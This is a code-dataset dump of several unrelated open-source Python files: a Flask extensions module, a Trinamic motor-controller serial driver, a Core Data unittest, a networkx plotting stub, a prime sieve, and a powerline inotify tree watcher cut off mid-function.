morphocut_server/extensions.py | madelinetharp/morphocut-server | 0 | 9113 | <filename>morphocut_server/extensions.py
from flask_sqlalchemy import SQLAlchemy
from flask_redis import FlaskRedis
from flask_migrate import Migrate
# from flask_rq2 import RQ
from rq import Queue
from morphocut_server.worker import redis_conn
database = SQLAlchemy()
redis_store = FlaskRedis()
migrate = Migrate()
redis_queue = Queue(connection=redis_conn)
flask_rq = None
| <filename>morphocut_server/extensions.py
from flask_sqlalchemy import SQLAlchemy
from flask_redis import FlaskRedis
from flask_migrate import Migrate
# from flask_rq2 import RQ
from rq import Queue
from morphocut_server.worker import redis_conn
database = SQLAlchemy()
redis_store = FlaskRedis()
migrate = Migrate()
redis_queue = Queue(connection=redis_conn)
flask_rq = None
| en | 0.480525 | # from flask_rq2 import RQ | 1.520519 | 2 |
acq4/drivers/ThorlabsMFC1/tmcm.py | aleonlein/acq4 | 1 | 9114 | from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'sco': 30,
'gco': 31,
'cco': 32,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
If valus is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
| from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'sco': 30,
'gco': 31,
'cco': 32,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
If valus is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
| en | 0.758466 | Low-level serial communication for Trinamic TMCM-140-42-SE controller (used internally for the Thorlabs MFC1) # this is nicer because it provides deadlock debugging information ## relative imports not allowed when running from command prompt, so ## we adjust sys.path when running the script for testing # decorator for automatic mutex lock/unlock # negative values indicate read-only parameters port: serial COM port (eg. COM3 or /dev/ttyACM0) baudrate: 9600 by default module_addr: 1 by default Send a command to the controller and return the reply. If an error is returned from the controller then raise an exception. Begin rotating motor. velocity: -2047 to +2047 negative values turn left; positive values turn right. Stop the motor. Note: does not stop currently running programs. Rotate until reaching *pos*. pos: The target position relative: If True, then *pos* is interpreted as relative to the current position velocity: Optionally set the target velocity before moving Set a parameter value. If valus is 'accum' then the parameter is set from the accumulator register. Set multiple parameters. The driver is thread-locked until all parameters are set. Return a global parameter or copy global to accumulator. Use param='gpX' to refer to general-purpose variables. Stop the currently running TMCL program. Start running TMCL program code from the given address (in bytes?), or from the current address if None. Begin loading TMCL commands into EEPROM . Finish loading TMCL commands into EEPROM. Return current program status: 0=stop, 1=run, 2=step, 3=reset Program jump to *addr* (instruction index). Usage: jump(address) jump(cond, address) Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd. Send a command to the controller. # Try packing the value first as unsigned, then signed. (the overlapping # integer ranges have identical bit representation, so there is no # ambiguity) Read and parse a reply from the controller. Raise an exception if an error was reported. # insert an extra stop to ensure the program can't leak # into previously written code. | 2.148772 | 2 |
tests/generators/ios/test_core_data.py | brianleungwh/signals | 3 | 9115 | import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
| import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
| none | 1 | 2.394328 | 2 |
|
mcmc/plot_graph.py | hudalao/mcmc | 0 | 9116 | <filename>mcmc/plot_graph.py
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
| <filename>mcmc/plot_graph.py
# commend the lines for plotting using
import matplotlib.pyplot as plt
import networkx as nx
def plot_graph(G, N, time_point, posi):
#setting up for graph plotting
#setting the positions for all nodes
pos = {}
for ii in range(N):
pos[ii] = posi[ii]
# plt.figure(time_point + 1)
elarge=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] >0.5]
esmall=[(u,v) for (u,v,d) in G[time_point].edges(data=True) if d['weight'] <=0.5]
# nodes
# nx.draw_networkx_nodes(G[time_point],pos,node_size=200)
# edges
# nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3)
# nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed')
# labels
# nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif')
| en | 0.443927 | # commend the lines for plotting using #setting up for graph plotting #setting the positions for all nodes # plt.figure(time_point + 1) # nodes # nx.draw_networkx_nodes(G[time_point],pos,node_size=200) # edges # nx.draw_networkx_edges(G[time_point],pos,edgelist=elarge,width=3) # nx.draw_networkx_edges(G[time_point],pos,edgelist=esmall,width=3,alpha=0.5,edge_color='b',style='dashed') # labels # nx.draw_networkx_labels(G[time_point],pos,font_size=10,font_family='sans-serif') | 3.097418 | 3 |
Number Theory/Sieve_of_Eratosthenes.py | mishrakeshav/Competitive-Programming | 2 | 9117 | from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
| from sys import stdin
input = stdin.readline
N = int(input())
primes = [1]*(N+1)
primes[0] = 0
primes[1] = 0
for i in range(2,int(N**0.5)+1):
if primes[i]:
for j in range(i*i,N+1,i):
primes[j] = 0
for i in range(N+1):
if primes[i]:
print(i,end = " ")
| none | 1 | 3.400944 | 3 |
|
powerline/lib/tree_watcher.py | kruton/powerline | 19 | 9118 | <filename>powerline/lib/tree_watcher.py
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, absolute_import, print_function)
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
import sys
import os
import errno
from time import sleep
from powerline.lib.monotonic import monotonic
from powerline.lib.inotify import INotify, INotifyError
class NoSuchDir(ValueError):
pass
class BaseDirChanged(ValueError):
pass
class DirTooLarge(ValueError):
def __init__(self, bdir):
ValueError.__init__(self, 'The directory {0} is too large to monitor. Try increasing the value in /proc/sys/fs/inotify/max_user_watches'.format(bdir))
def realpath(path):
return os.path.abspath(os.path.realpath(path))
class INotifyTreeWatcher(INotify):
is_dummy = False
def __init__(self, basedir, ignore_event=None):
super(INotifyTreeWatcher, self).__init__()
self.basedir = realpath(basedir)
self.watch_tree()
self.modified = True
self.ignore_event = (lambda path, name: False) if ignore_event is None else ignore_event
def watch_tree(self):
self.watched_dirs = {}
self.watched_rmap = {}
try:
self.add_watches(self.basedir)
except OSError as e:
if e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
def add_watches(self, base, top_level=True):
''' Add watches for this directory and all its descendant directories,
recursively. '''
base = realpath(base)
# There may exist a link which leads to an endless
# add_watches loop or to maximum recursion depth exceeded
if not top_level and base in self.watched_dirs:
return
try:
is_dir = self.add_watch(base)
except OSError as e:
if e.errno == errno.ENOENT:
# The entry could have been deleted between listdir() and
# add_watch().
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
if e.errno == errno.EACCES:
# We silently ignore entries for which we dont have permission,
# unless they are the top level dir
if top_level:
raise NoSuchDir('You do not have permission to monitor {0}'.format(base))
return
raise
else:
if is_dir:
try:
files = os.listdir(base)
except OSError as e:
if e.errno in (errno.ENOTDIR, errno.ENOENT):
# The dir was deleted/replaced between the add_watch()
# and listdir()
if top_level:
raise NoSuchDir('The dir {0} does not exist'.format(base))
return
raise
for x in files:
self.add_watches(os.path.join(base, x), top_level=False)
elif top_level:
# The top level dir is a file, not good.
raise NoSuchDir('The dir {0} does not exist'.format(base))
def add_watch(self, path):
import ctypes
bpath = path if isinstance(path, bytes) else path.encode(self.fenc)
wd = self._add_watch(self._inotify_fd, ctypes.c_char_p(bpath),
# Ignore symlinks and watch only directories
self.DONT_FOLLOW | self.ONLYDIR |
self.MODIFY | self.CREATE | self.DELETE |
self.MOVE_SELF | self.MOVED_FROM | self.MOVED_TO |
self.ATTRIB | self.DELETE_SELF)
if wd == -1:
eno = ctypes.get_errno()
if eno == errno.ENOTDIR:
return False
raise OSError(eno, 'Failed to add watch for: {0}: {1}'.format(path, self.os.strerror(eno)))
self.watched_dirs[path] = wd
self.watched_rmap[wd] = path
return True
def process_event(self, wd, mask, cookie, name):
if wd == -1 and (mask & self.Q_OVERFLOW):
# We missed some INOTIFY events, so we dont
# know the state of any tracked dirs.
self.watch_tree()
self.modified = True
return
path = self.watched_rmap.get(wd, None)
if path is not None:
self.modified = not self.ignore_event(path, name)
if mask & self.CREATE:
# A new sub-directory might have been created, monitor it.
try:
self.add_watch(os.path.join(path, name))
except OSError as e:
if e.errno == errno.ENOENT:
# Deleted before add_watch()
pass
elif e.errno == errno.ENOSPC:
raise DirTooLarge(self.basedir)
else:
raise
if (mask & self.DELETE_SELF or mask & self.MOVE_SELF) and path == self.basedir:
raise BaseDirChanged('The directory %s was moved/deleted' % path)
def __call__(self):
self.read()
ret = self.modified
self.modified = False
return ret
class DummyTreeWatcher(object):
is_dummy = True
def __init__(self, basedir):
self.basedir = realpath(basedir)
def __call__(self):
return False
class TreeWatcher(object):
def __init__(self, expire_time=10):
self.watches = {}
self.last_query_times = {}
self.expire_time = expire_time * 60
def watch(self, path, logger=None, ignore_event=None):
path = realpath(path)
try:
w = INotifyTreeWatcher(path, ignore_event=ignore_event)
except (INotifyError, DirTooLarge) as e:
if logger is not None and not isinstance(e, INotifyError):
logger.warn('Failed to watch path: {0} with error: {1}'.format(path, e))
w = DummyTreeWatcher(path)
self.watches[path] = w
return w
def is_actually_watched(self, path):
w = self.watches.get(path, None)
return not getattr(w, 'is_dummy', True)
def expire_old_queries(self):
pop = []
now = monotonic()
for path, lt in self.last_query_times.items():
if now - lt > self.expire_time:
pop.append(path)
for path in pop:
del self.last_query_times[path]
def __call__(self, path, logger=None, ignore_event=None):
path = realpath(path)
self.expire_old_queries()
self.last_query_times[path] = monotonic()
w = self.watches.get(path, None)
if w is None:
try:
self.watch(path, logger=logger, ignore_event=ignore_event)
except NoSuchDir:
